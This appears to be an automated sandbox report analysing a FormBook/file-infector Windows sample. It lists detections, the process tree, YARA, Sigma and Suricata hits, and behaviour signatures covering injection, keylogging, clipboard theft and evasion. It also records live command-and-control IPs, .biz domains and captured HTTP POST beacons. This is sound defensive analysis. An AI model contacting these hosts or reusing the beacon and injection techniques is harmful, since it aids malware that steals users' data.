Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
LiuUGJK9vH.exe

Overview

General Information

Sample name:LiuUGJK9vH.exe
renamed because original name is a hash value
Original sample name:1273e390eab2f69aa5ed380f296a7cd6c8ff01142367fe5dd76eae5f515947e2.exe
Analysis ID:1588299
MD5:690a2cbb7f785f6f90a0b510f31d40de
SHA1:624e1b8b472706e33e7d9b90ac1626153854433f
SHA256:1273e390eab2f69aa5ed380f296a7cd6c8ff01142367fe5dd76eae5f515947e2
Tags:exeWormm0yvuser-adrian__luca
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Creates files in the system32 config directory
Drops executable to a common third party application directory
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Writes to foreign memory regions
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Uncommon Svchost Parent Process
Spawns drivers
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • LiuUGJK9vH.exe (PID: 4452 cmdline: "C:\Users\user\Desktop\LiuUGJK9vH.exe" MD5: 690A2CBB7F785F6F90A0B510F31D40DE)
    • svchost.exe (PID: 4420 cmdline: "C:\Users\user\Desktop\LiuUGJK9vH.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
  • armsvc.exe (PID: 5612 cmdline: "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe" MD5: 1E28FD404AAE9396AA5D6A1141873E0E)
  • alg.exe (PID: 5960 cmdline: C:\Windows\System32\alg.exe MD5: 01FCE6399A1AC48F9D7931507B2534BB)
  • AppVStrm.sys (PID: 4 cmdline: MD5: BDA55F89B69757320BC125FF1CB53B26)
  • AppvVemgr.sys (PID: 4 cmdline: MD5: E70EE9B57F8D771E2F4D6E6B535F6757)
  • AppvVfs.sys (PID: 4 cmdline: MD5: 2CBABD729D5E746B6BD8DC1B4B4DB1E1)
  • AppVClient.exe (PID: 1196 cmdline: C:\Windows\system32\AppVClient.exe MD5: 04218364223ED3D355D0195140331BD0)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.1792348155.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000004.00000002.1793038630.0000000003950000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      4.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        4.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

          Sigma Signatures

          System Summary

          barindex
          Sigma detected: Execution of Suspicious File Type Extension
          Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: , CommandLine: , CommandLine|base64offset|contains: , Image: C:\Windows\System32\drivers\AppVStrm.sys, NewProcessName: C:\Windows\System32\drivers\AppVStrm.sys, OriginalFileName: C:\Windows\System32\drivers\AppVStrm.sys, ParentCommandLine: , ParentImage: , ParentProcessId: -1, ProcessCommandLine: , ProcessId: 4, ProcessName: AppVStrm.sys
          Sigma detected: Uncommon Svchost Parent Process
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\LiuUGJK9vH.exe", CommandLine: "C:\Users\user\Desktop\LiuUGJK9vH.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\LiuUGJK9vH.exe", ParentImage: C:\Users\user\Desktop\LiuUGJK9vH.exe, ParentProcessId: 4452, ParentProcessName: LiuUGJK9vH.exe, ProcessCommandLine: "C:\Users\user\Desktop\LiuUGJK9vH.exe", ProcessId: 4420, ProcessName: svchost.exe
          Sigma detected: Windows Processes Suspicious Parent Directory
          Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\LiuUGJK9vH.exe", CommandLine: "C:\Users\user\Desktop\LiuUGJK9vH.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\LiuUGJK9vH.exe", ParentImage: C:\Users\user\Desktop\LiuUGJK9vH.exe, ParentProcessId: 4452, ParentProcessName: LiuUGJK9vH.exe, ProcessCommandLine: "C:\Users\user\Desktop\LiuUGJK9vH.exe", ProcessId: 4420, ProcessName: svchost.exe

          Suricata Signatures

          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-01-10T23:40:54.447678+010020181411A Network Trojan was detected54.244.188.17780192.168.2.849704TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-01-10T23:40:54.447678+010020377711A Network Trojan was detected54.244.188.17780192.168.2.849704TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-01-10T23:40:54.311918+010028508511Malware Command and Control Activity Detected192.168.2.84970454.244.188.17780TCP

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Antivirus / Scanner detection for submitted sample
          Source: LiuUGJK9vH.exeAvira: detected
          Antivirus detection for URL or domain
          Source: http://54.244.188.177/Avira URL Cloud: Label: malware
          Source: http://54.244.188.177/hdjf~AAvira URL Cloud: Label: malware
          Source: http://54.244.188.177/hdjfAvira URL Cloud: Label: malware
          Antivirus detection for dropped file
          Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeAvira: detection malicious, Label: W32/Infector.Gen
          Source: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeAvira: detection malicious, Label: W32/Infector.Gen
          Source: C:\Windows\System32\AppVClient.exeAvira: detection malicious, Label: W32/Infector.Gen
          Source: C:\Windows\System32\alg.exeAvira: detection malicious, Label: W32/Infector.Gen
          Multi AV Scanner detection for submitted file
          Source: LiuUGJK9vH.exeReversingLabs: Detection: 91%
          Yara detected FormBook
          Source: Yara matchFile source: 4.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000002.1792348155.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.1793038630.0000000003950000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          AI detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
          Machine Learning detection for dropped file
          Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJoe Sandbox ML: detected
          Source: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJoe Sandbox ML: detected
          Source: C:\Windows\System32\AppVClient.exeJoe Sandbox ML: detected
          Source: C:\Windows\System32\alg.exeJoe Sandbox ML: detected
          Machine Learning detection for sample
          Source: LiuUGJK9vH.exeJoe Sandbox ML: detected
          Source: LiuUGJK9vH.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
          Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: LiuUGJK9vH.exe, 00000000.00000003.1459636308.0000000003EF0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe.0.dr
          Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdb source: DiagnosticsHub.StandardCollector.Service.exe.0.dr
          Source: Binary string: AppVClient.pdbGCTL source: AppVClient.exe.0.dr
          Source: Binary string: ALG.pdbGCTL source: LiuUGJK9vH.exe, 00000000.00000003.1463706750.0000000003EF0000.00000004.00001000.00020000.00000000.sdmp, alg.exe.0.dr
          Source: Binary string: AppVClient.pdb source: AppVClient.exe.0.dr
          Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdbGCTL source: DiagnosticsHub.StandardCollector.Service.exe.0.dr
          Source: Binary string: wntdll.pdbUGP source: LiuUGJK9vH.exe, 00000000.00000003.1466769088.0000000004250000.00000004.00001000.00020000.00000000.sdmp, LiuUGJK9vH.exe, 00000000.00000003.1472318667.0000000004250000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1751681677.0000000003900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1793138117.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1749096738.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1793138117.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: LiuUGJK9vH.exe, 00000000.00000003.1466769088.0000000004250000.00000004.00001000.00020000.00000000.sdmp, LiuUGJK9vH.exe, 00000000.00000003.1472318667.0000000004250000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000004.00000003.1751681677.0000000003900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1793138117.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1749096738.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1793138117.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: ALG.pdb source: LiuUGJK9vH.exe, 00000000.00000003.1463706750.0000000003EF0000.00000004.00001000.00020000.00000000.sdmp, alg.exe.0.dr

          Spreading

          barindex
          Infects executable files (exe, dll, sys, html)
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeSystem file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to behavior
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeSystem file written: C:\Windows\System32\AppVClient.exeJump to behavior
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeSystem file written: C:\Windows\System32\alg.exeJump to behavior
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_0046445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_0046445A
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_0046C6D1 FindFirstFileW,FindClose,0_2_0046C6D1
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_0046C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0046C75C
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_0046EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0046EF95
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_0046F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0046F0F2
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_0046F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0046F3F3
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_004637EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_004637EF
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_00463B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00463B12
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_0046BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0046BCBC

          Networking

          barindex
          Suricata IDS alerts for network traffic
          Source: Network trafficSuricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.8:49704 -> 54.244.188.177:80
          Source: Joe Sandbox ViewIP Address: 54.244.188.177 54.244.188.177
          Source: Joe Sandbox ViewIP Address: 18.141.10.107 18.141.10.107
          Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 54.244.188.177:80 -> 192.168.2.8:49704
          Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 54.244.188.177:80 -> 192.168.2.8:49704
          Source: global trafficHTTP traffic detected: POST /hdjf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
          Source: global trafficHTTP traffic detected: POST /rai HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_004722EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_004722EE
          Source: global trafficDNS traffic detected: DNS query: pywolwnvd.biz
          Source: global trafficDNS traffic detected: DNS query: ssbzmoy.biz
          Source: unknownHTTP traffic detected: POST /hdjf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
          Source: LiuUGJK9vH.exe, 00000000.00000002.1480829576.0000000000BBF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/
          Source: LiuUGJK9vH.exe, 00000000.00000002.1480829576.0000000000BBF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/8
          Source: LiuUGJK9vH.exe, 00000000.00000002.1480829576.0000000000BBF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/rai
          Source: LiuUGJK9vH.exe, 00000000.00000002.1480829576.0000000000BBF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/raiI
          Source: LiuUGJK9vH.exe, 00000000.00000002.1480616556.0000000000AE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/raie
          Source: LiuUGJK9vH.exe, 00000000.00000002.1480829576.0000000000BBF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/x
          Source: LiuUGJK9vH.exe, 00000000.00000002.1480829576.0000000000BB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107:80/rai
          Source: LiuUGJK9vH.exe, 00000000.00000002.1480829576.0000000000BA6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/
          Source: LiuUGJK9vH.exe, 00000000.00000002.1480616556.0000000000AE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/hdjf
          Source: LiuUGJK9vH.exe, 00000000.00000002.1480616556.0000000000AE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/hdjf~A
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_00474164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00474164
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_00474164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00474164
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_00473F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00473F66
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_0046001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_0046001C
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_0048CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0048CABC

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 4.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000002.1792348155.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.1793038630.0000000003950000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Binary is likely a compiled AutoIt script file
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: This is a third-party compiled AutoIt script.0_2_00403B3A
          Source: LiuUGJK9vH.exeString found in binary or memory: This is a third-party compiled AutoIt script.
          Source: LiuUGJK9vH.exe, 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_62348d65-f
          Source: LiuUGJK9vH.exe, 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_0878ef87-3
          Source: LiuUGJK9vH.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_28cd403f-1
          Source: LiuUGJK9vH.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_c11a1c63-d
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0042CBC3 NtClose,4_2_0042CBC3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B72B60 NtClose,LdrInitializeThunk,4_2_03B72B60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B72DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_03B72DF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B735C0 NtCreateMutant,LdrInitializeThunk,4_2_03B735C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B74340 NtSetContextThread,4_2_03B74340
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B74650 NtSuspendThread,4_2_03B74650
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B72BA0 NtEnumerateValueKey,4_2_03B72BA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B72B80 NtQueryInformationFile,4_2_03B72B80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B72BF0 NtAllocateVirtualMemory,4_2_03B72BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B72BE0 NtQueryValueKey,4_2_03B72BE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B72AB0 NtWaitForSingleObject,4_2_03B72AB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B72AF0 NtWriteFile,4_2_03B72AF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B72AD0 NtReadFile,4_2_03B72AD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B72FB0 NtResumeThread,4_2_03B72FB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B72FA0 NtQuerySection,4_2_03B72FA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B72F90 NtProtectVirtualMemory,4_2_03B72F90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B72FE0 NtCreateFile,4_2_03B72FE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B72F30 NtCreateSection,4_2_03B72F30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B72F60 NtCreateProcessEx,4_2_03B72F60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B72EA0 NtAdjustPrivilegesToken,4_2_03B72EA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B72E80 NtReadVirtualMemory,4_2_03B72E80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B72EE0 NtQueueApcThread,4_2_03B72EE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B72E30 NtWriteVirtualMemory,4_2_03B72E30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B72DB0 NtEnumerateKey,4_2_03B72DB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B72DD0 NtDelayExecution,4_2_03B72DD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B72D30 NtUnmapViewOfSection,4_2_03B72D30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B72D10 NtMapViewOfSection,4_2_03B72D10
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B72D00 NtSetInformationFile,4_2_03B72D00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B72CA0 NtQueryInformationToken,4_2_03B72CA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B72CF0 NtOpenProcess,4_2_03B72CF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B72CC0 NtQueryVirtualMemory,4_2_03B72CC0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B72C00 NtQueryInformationProcess,4_2_03B72C00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B72C70 NtFreeVirtualMemory,4_2_03B72C70
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B72C60 NtCreateKey,4_2_03B72C60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B73090 NtSetValueKey,4_2_03B73090
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B73010 NtOpenDirectoryObject,4_2_03B73010
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B739B0 NtGetContextThread,4_2_03B739B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B73D10 NtOpenProcessToken,4_2_03B73D10
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B73D70 NtOpenThread,4_2_03B73D70
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_0046A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_0046A1EF
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_00458310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00458310
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_004651BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_004651BD
          Source: C:\Windows\System32\AppVClient.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Roaming\a49546759c90d829.binJump to behavior
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_0040E6A00_2_0040E6A0
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_0042D9750_2_0042D975
